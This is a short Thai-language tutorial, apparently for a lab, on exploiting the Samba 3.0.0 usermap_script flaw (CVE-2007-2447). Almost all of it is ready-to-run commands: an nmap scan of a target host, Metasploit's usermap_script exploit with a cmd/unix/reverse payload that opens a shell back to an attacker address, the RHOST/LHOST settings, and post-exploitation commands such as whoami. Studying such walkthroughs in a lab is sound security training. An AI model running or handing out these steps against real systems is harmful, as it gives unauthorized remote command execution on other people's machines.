บทนำ (Overview)
บทความนี้นำเสนอวิธีการยึดช่องโหว่ของ “SAMBA” เวอร์ชัน “3.0.0” (smbd) ที่อนุญาติให้สามารถควบคุมระยะไกลผ่านคำสั่งต่าง ๆ ได้ (remote execution) สามารถศึกษารายละเอียดเพิ่มเติมได้ที่ http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447
ขั้นตอน (Steps)
- ให้ตรวจสอบหมายเลข “Port” ที่ให้บริการ ของเครื่องเป้าหมายโดยใช้ “Nmap” ดังนี้
nmap -A -v 192.168.1.58
- ตรวจสอบ “Port” และ “Version” ของ “SAMBA” จากตัวอย่างคือ
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
- ใช้คำสั่ง “msfconsole” เพื่อใช้งาน “Metasploit”
msfconsole
- ให้ใช้คำสั่งค้นหาตัว “usermap_script” ดังกล่าว
search usermap_script
- เมื่อเจอ “Module” ดังกล่าวให้เรียกใช้โดยใช้คำสั่ง “use”
use exploit/multi/samba/usermap_script
- จากนั้นเลือก “metasploit payload” โดยที่ “Payload” คือ ชิ้นส่วนของโปรแกรมที่ทำให้เราสามารถควบคุมระบบคอมพิวเตอร์ภายหลังจากที่ช่องโหว่ถูกยึดแล้ว (Exploited) ซึ่ง “Payload” ดังกล่าวจากถูกส่งไปยังเครื่องเป้าหมายโดย “Exploit”
show payloads set payload cmd/unix/reverse
- ตั้งค่า “Parameter” ต่าง ๆ ดังนี้
//แสดง parameter ที่ต้องตั้งค่า show options //IP เหยื่อ set RHOST 192.168.1.58 //IP ผู้โจมตี set LHOST 192.168.1.57 //Port เป้าหมาย set RPORT 445
- เมื่อตั้งค่าเสร็จทดลองใช้คำสั่ง “exploit” ถ้าสำเร็จเราสามารถใช้ “command” ต่าง ๆ บนเครื่องเป้าหมายได้ดังนี้
//คำสั่ง exploit exploit //คำสั่งบนเครื่องเป้าหมาย hostname uname -a whoami